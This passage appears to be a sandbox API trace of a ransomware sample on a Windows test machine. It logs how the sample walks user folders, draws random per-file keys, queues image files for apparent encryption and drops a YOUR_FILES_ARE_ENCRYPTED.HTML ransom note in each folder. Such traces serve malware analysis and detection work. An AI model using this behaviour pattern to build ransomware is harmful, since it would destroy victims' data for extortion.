ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xfe75893d, cFileName="..", cAlternateFileName="")) returned 1 [0125.325] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x19ec60, dwReserved1=0xfe75893d, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0125.325] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.325] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\desktop.ini") returned 61 [0125.325] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0125.325] lstrlenW (lpString=".ini") returned 4 [0125.325] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0125.325] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0125.326] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=190) returned 1 [0125.326] CloseHandle (hObject=0x328) returned 1 [0125.326] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x19ec60, dwReserved1=0xfe75893d, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0125.326] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0125.326] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0125.326] GetProcessHeap () returned 0x600000 [0125.326] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0125.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0125.327] WriteFile (in: hFile=0x31c, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0125.328] CloseHandle (hObject=0x31c) returned 1 [0125.328] GetProcessHeap () returned 0x600000 [0125.328] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0125.328] GetProcessHeap () returned 0x600000 [0125.328] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0125.328] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x719005e0, ftCreationTime.dwHighDateTime=0x1d701ed, ftLastAccessTime.dwLowDateTime=0x2d0b6610, ftLastAccessTime.dwHighDateTime=0x1d7049c, ftLastWriteTime.dwLowDateTime=0x2d0b6610, ftLastWriteTime.dwHighDateTime=0x1d7049c, nFileSizeHigh=0x0, nFileSizeLow=0x12905, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="USSr00p i3Ef9f7T_.png", cAlternateFileName="USSR00~1.PNG")) returned 1 [0125.328] StrStrIW (lpFirst="USSr00p i3Ef9f7T_.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.328] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\USSr00p i3Ef9f7T_.png") returned 56 [0125.328] PathFindExtensionW (pszPath="USSr00p i3Ef9f7T_.png") returned=".png" [0125.328] lstrlenW (lpString=".png") returned 4 [0125.328] PathFindExtensionW (pszPath="USSr00p i3Ef9f7T_.png") returned=".png" [0125.328] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\USSr00p i3Ef9f7T_.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ussr00p i3ef9f7t_.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.329] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=76037) returned 1 [0125.329] GetProcessHeap () returned 0x600000 [0125.329] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.329] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="FD") returned 2 [0125.329] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="A9") returned 2 [0125.329] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="2D") returned 2 [0125.329] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="BD") returned 2 [0125.329] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="0E") returned 2 [0125.329] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="C5") returned 2 [0125.329] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="0C") returned 2 [0125.329] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="83") returned 2 [0125.329] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="66") returned 2 [0125.329] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="40") returned 2 [0125.329] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="DE") returned 2 [0125.329] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="A3") returned 2 [0125.329] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="72") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="76") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="D8") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="FB") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="D4") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="39") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="2B") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="2D") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="D2") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="0B") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="F9") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="B5") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="CA") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="37") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="0C") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="00") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="3A") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="F2") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="32") returned 2 [0125.330] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="07") returned 2 [0125.330] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\USSr00p i3Ef9f7T_.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\USSr00p i3Ef9f7T_.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\USSr00p i3Ef9f7T_.png" [0125.330] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.331] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.334] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9ab6290, ftCreationTime.dwHighDateTime=0x1d702af, ftLastAccessTime.dwLowDateTime=0x25be0ed0, ftLastAccessTime.dwHighDateTime=0x1d70672, ftLastWriteTime.dwLowDateTime=0x25be0ed0, ftLastWriteTime.dwHighDateTime=0x1d70672, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="zves_hPpDUBMZ7qjvt.gif", cAlternateFileName="ZVES_H~1.GIF")) returned 1 [0125.334] StrStrIW (lpFirst="zves_hPpDUBMZ7qjvt.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.334] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\zves_hPpDUBMZ7qjvt.gif") returned 57 [0125.334] PathFindExtensionW (pszPath="zves_hPpDUBMZ7qjvt.gif") returned=".gif" [0125.334] lstrlenW (lpString=".gif") returned 4 [0125.334] PathFindExtensionW (pszPath="zves_hPpDUBMZ7qjvt.gif") returned=".gif" [0125.334] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\zves_hPpDUBMZ7qjvt.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\zves_hppdubmz7qjvt.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.334] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=42904) returned 1 [0125.334] GetProcessHeap () returned 0x600000 [0125.334] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.335] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="72") returned 2 [0125.335] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="C8") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="6E") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="C9") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="5D") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="32") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="8A") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="0E") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="8B") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="86") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="52") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="4B") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="AB") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="C4") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="50") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="A0") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="CE") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="C7") returned 2 [0125.335] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="B2") returned 2 [0125.336] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="15") returned 2 [0125.336] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="FF") returned 2 [0125.336] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="C4") returned 2 [0125.336] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="90") returned 2 [0125.336] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="6A") returned 2 [0125.336] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="30") returned 2 [0125.336] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="9F") returned 2 [0125.336] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="11") returned 2 [0125.336] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="C0") returned 2 [0125.336] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="A5") returned 2 [0125.336] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="CC") returned 2 [0125.336] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="2A") returned 2 [0125.336] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="6B") returned 2 [0125.336] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\zves_hPpDUBMZ7qjvt.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\zves_hPpDUBMZ7qjvt.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\zves_hPpDUBMZ7qjvt.gif" [0125.336] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.336] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.341] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9ab6290, ftCreationTime.dwHighDateTime=0x1d702af, ftLastAccessTime.dwLowDateTime=0x25be0ed0, ftLastAccessTime.dwHighDateTime=0x1d70672, ftLastWriteTime.dwLowDateTime=0x25be0ed0, ftLastWriteTime.dwHighDateTime=0x1d70672, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="zves_hPpDUBMZ7qjvt.gif", cAlternateFileName="ZVES_H~1.GIF")) returned 0 [0125.341] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0125.341] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 64 [0125.341] GetProcessHeap () returned 0x600000 [0125.341] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0125.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0125.342] WriteFile (in: hFile=0x314, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0125.342] CloseHandle (hObject=0x314) returned 1 [0125.342] GetProcessHeap () returned 0x600000 [0125.342] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0125.342] GetProcessHeap () returned 0x600000 [0125.343] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0125.343] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0125.343] StrStrIW (lpFirst="PrintHood", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.343] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\PrintHood") returned 35 [0125.343] GetProcessHeap () returned 0x600000 [0125.343] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0125.344] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\PrintHood" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\PrintHood") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\PrintHood" [0125.344] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\PrintHood", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\PrintHood\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\PrintHood\\*" [0125.344] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\PrintHood\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9ab6290, ftCreationTime.dwHighDateTime=0x1d702af, ftLastAccessTime.dwLowDateTime=0x25be0ed0, ftLastAccessTime.dwHighDateTime=0x1d70672, ftLastWriteTime.dwLowDateTime=0x25be0ed0, ftLastWriteTime.dwHighDateTime=0x1d70672, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="zves_hPpDUBMZ7qjvt.gif", cAlternateFileName="翿")) returned 0xffffffff [0125.344] GetProcessHeap () returned 0x600000 [0125.344] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0125.344] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Recent", cAlternateFileName="")) returned 1 [0125.344] StrStrIW (lpFirst="Recent", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.344] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Recent") returned 32 [0125.344] GetProcessHeap () returned 0x600000 [0125.345] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0125.345] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Recent" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Recent") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Recent" [0125.345] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Recent", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Recent\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Recent\\*" [0125.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Recent\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9ab6290, ftCreationTime.dwHighDateTime=0x1d702af, ftLastAccessTime.dwLowDateTime=0x25be0ed0, ftLastAccessTime.dwHighDateTime=0x1d70672, ftLastWriteTime.dwLowDateTime=0x25be0ed0, ftLastWriteTime.dwHighDateTime=0x1d70672, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="zves_hPpDUBMZ7qjvt.gif", cAlternateFileName="翿")) returned 0xffffffff [0125.345] GetProcessHeap () returned 0x600000 [0125.345] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0125.345] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0125.345] StrStrIW (lpFirst="Saved Games", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.345] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Saved Games") returned 37 [0125.345] GetProcessHeap () returned 0x600000 [0125.345] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0125.345] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Saved Games" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Saved Games") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Saved Games" [0125.345] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Saved Games", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*" [0125.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626978 [0125.345] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0125.345] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0125.345] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.345] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini") returned 49 [0125.345] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0125.345] lstrlenW (lpString=".ini") returned 4 [0125.345] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0125.345] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\saved games\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.346] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=282) returned 1 [0125.346] CloseHandle (hObject=0x31c) returned 1 [0125.346] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0125.346] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0125.346] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, 